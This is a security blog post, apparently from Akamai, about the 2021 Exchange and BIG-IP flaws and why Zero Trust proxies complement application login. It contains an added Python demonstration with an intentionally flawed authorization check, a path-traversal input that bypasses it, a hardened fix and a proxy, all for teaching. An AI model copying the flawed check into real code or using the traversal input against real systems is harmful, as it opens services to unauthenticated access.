For starters, on-premises Microsoft Exchange servers were attacked in droves after a set of zero-day vulnerabilities was discovered, resulting in [widespread infiltration of hundreds of thousands of organizations](<https://www.zdnet.com/article/microsoft-exchange-server-attacks-theyre-being-hacked-faster-than-we-can-count-says-security-company/>). These vulnerabilities allow malicious actors to remotely control machines, read emails, and gain access to internal corporate assets. To illustrate how widespread this attack was, in the two days following the disclosure, Akamai observed [over 290,000 unique attempts to scan for and/or exploit these vulnerabilities on our global platform](<https://blogs.akamai.com/2021/03/appsec-protections-for-microsoft-exchange-cve-2021-26855-cve-2021-26857-cve-2021-26858-cve-2021-2706.html>). Microsoft rapidly issued patches for the vulnerabilities, but the breadth and scale of the breaches won't be truly known for some time, with some enterprises now facing advanced persistent threats as a result of the exploit.

As if this wasn't already bad enough, customers of the IT security company F5, which have included almost all of the world's Fortune 50 companies, found themselves rocked by [yet another set of highly severe application vulnerabilities](<https://thehackernews.com/2021/03/latest-f5-big-ip-bug-under-active.html>), this time in F5's BIG-IP family of load balancing and security products. These vulnerabilities allow remote execution of system commands, potentially giving complete control of the device: interception and redirection of web traffic, decryption of traffic destined for web servers, and use of the device as a jump host to reach other areas of the network.
The National Vulnerability Database rated these vulnerabilities as critical, some with a [CVSS rating](<https://nvd.nist.gov/vuln-metrics/cvss>) as high as 9.9 out of 10.

Both sets of vulnerabilities, which are actively being exploited by real-world attackers, involve robust, highly utilized systems that have authentication built directly in. So how did this happen?

## Application Authentication

In both the Microsoft Exchange and F5 BIG-IP products, authentication is required before privileged activities can be performed. While this is an important and required facet of security, many individuals falsely assume that this authentication, which is applied at the application level, provides ample protection.

This is a misconception, however. If an end user can reach an application such that it prompts them to enter credentials, they have already caused code to execute. This is true regardless of the authentication method or prompt. It does not matter whether the application redirects an end user to an IdP or asks for a username and password directly; the very act of asking for credentials means the application was contacted over the network, code was executed, and a response was returned to the end user. Everything on that path -- request parsing, routing, the authentication check itself -- runs on behalf of a client that has presented nothing but a network connection.

And this is where the problem lies. Applications are written by human beings, and human beings make mistakes. This is at the heart of the vulnerabilities in Microsoft Exchange and F5 BIG-IP. In both cases, incorrect checks around authentication allowed payloads to bypass valid logins and result in exploitation. In other words, the very fact that the systems are reachable is enough to exploit them.

If you can't trust that the application is implemented perfectly, then what can you do?

## Network Authentication

The right answer to this problem has been known for quite some time: tie authentication not only to the application but to the network as well. Zero Trust Network Access is one such method of doing this.

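The two sections above, and the "impersonating an actual end user" paragraph of the Verkada post earlier on this page, make one argument: an application's own login check runs only after the attacker's request has been parsed and routed, so a bug in that check is reachable by anyone who can open a connection, whereas a ZTNA proxy forwards nothing until it has established identity. The Python below is an added example for this page, not Akamai's product code and not the actual Exchange or BIG-IP flaw. It pairs a hypothetical application whose authorization check looks at the raw path while dispatch uses the normalized path (a common bug class, chosen for illustration) with a hardened version, then puts an identity-aware proxy in front of the unfixed one and counts how often application code ran on attacker input. The route names (`/static/`, `/admin/`), the group name, the class names and the `ProxyContext` fields are all assumptions.

```python
"""Added example for this page (not Akamai's code, and not the real Exchange or
BIG-IP bug): an application whose own login check can be bypassed, the same
application behind an identity-aware proxy, and what each lets an attacker reach."""
import posixpath
from dataclasses import dataclass
from typing import FrozenSet, Optional, Tuple

PUBLIC_PREFIX = "/static/"   # assumed unauthenticated route
ADMIN_PREFIX = "/admin/"     # assumed privileged route


class VulnerableApp:
    """Hypothetical application-level auth. The bug: authorization is decided on
    the raw request path, but the request is dispatched on the normalized path,
    so '/static/../admin/run' is treated as public and then routed to /admin/."""

    def __init__(self):
        self.code_executed = 0  # how often attacker-controlled input reached app code

    def handle(self, path: str, session: Optional[str] = None) -> Tuple[int, str]:
        self.code_executed += 1
        if not path.startswith(PUBLIC_PREFIX) and session is None:
            return 401, "login required"
        canonical = posixpath.normpath(path)
        if canonical.startswith(ADMIN_PREFIX):
            return 200, "privileged action executed: " + canonical
        return 200, "served " + canonical


class HardenedApp(VulnerableApp):
    """Same application, fixed: normalize first, decide on the canonical path,
    and deny by default (only the explicit public prefix skips the session check).
    Note that the attacker's request still executes code here; it just fails."""

    def handle(self, path: str, session: Optional[str] = None) -> Tuple[int, str]:
        self.code_executed += 1
        canonical = posixpath.normpath(path)
        if not canonical.startswith(PUBLIC_PREFIX) and session is None:
            return 401, "login required"
        if canonical.startswith(ADMIN_PREFIX):
            return 200, "privileged action executed: " + canonical
        return 200, "served " + canonical


@dataclass(frozen=True)
class ProxyContext:
    """What the proxy knows about a connection. Every field is derived by the proxy
    from its own identity provider and device agent; none comes from the request."""
    identity: Optional[str] = None
    groups: FrozenSet[str] = frozenset()
    device_posture_ok: bool = False
    mfa_verified: bool = False


class ZtnaProxy:
    """Identity-aware proxy: nothing is forwarded until identity, entitlement,
    device posture and MFA have all been verified. Denied traffic never reaches
    the application, so its auth bug is unreachable from outside (but still there)."""

    def __init__(self, app, allowed_group: str = "exchange-users"):
        self.app = app
        self.allowed_group = allowed_group

    def forward(self, ctx: ProxyContext, path: str, session: Optional[str] = None):
        if ctx.identity is None:
            return 403, "denied: no verified identity (app not contacted)"
        if not ctx.device_posture_ok:
            return 403, "denied: device posture (app not contacted)"
        if not ctx.mfa_verified:
            return 403, "denied: MFA required (app not contacted)"
        if self.allowed_group not in ctx.groups:
            return 403, "denied: not entitled to this app (app not contacted)"
        return self.app.handle(path, session)


ATTACK_PATH = "/static/../admin/run"   # constructed request, no credentials


def scenarios():
    """Run the attacker's request against each deployment; return (result, app code runs)."""
    direct = VulnerableApp()
    fixed = HardenedApp()
    fronted = VulnerableApp()
    proxy = ZtnaProxy(fronted)
    anonymous = ProxyContext()
    employee = ProxyContext(identity="alice@example.test", groups=frozenset({"exchange-users"}),
                            device_posture_ok=True, mfa_verified=True)
    return {
        "vulnerable_direct": (direct.handle(ATTACK_PATH), direct.code_executed),
        "hardened_direct": (fixed.handle(ATTACK_PATH), fixed.code_executed),
        "vulnerable_behind_ztna_attacker": (proxy.forward(anonymous, ATTACK_PATH), fronted.code_executed),
        "vulnerable_behind_ztna_employee": (proxy.forward(employee, "/static/app.js", session="alice"),
                                            fronted.code_executed),
    }


if __name__ == "__main__":
    for name, (result, executed) in scenarios().items():
        print(f"{name:34} -> {result[0]} {result[1]} (app code ran {executed}x)")
```

The interesting rows are the first and third: against the exposed application the unauthenticated request executes the privileged handler, while behind the proxy the identical request is dropped before a single line of application code runs. The fourth row shows that a verified employee still gets through, and the second shows that fixing the application is the real remediation; the proxy only removes the reachability the exploit depends on.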
In a Zero Trust environment, a proxy sits between an enterprise's internal network assets and the users who wish to access them. Basic network communication with the asset cannot be established until the end user's identity has been established.

The authenticators that can be used in a Zero Trust environment tend to be far richer than a VPN's, including user identity, groups, device posture, multi-factor authentication (MFA), time of day, location, user and entity behavior analytics (UEBA), client reputation, and more. Only once the proxy has validated the authentication and deter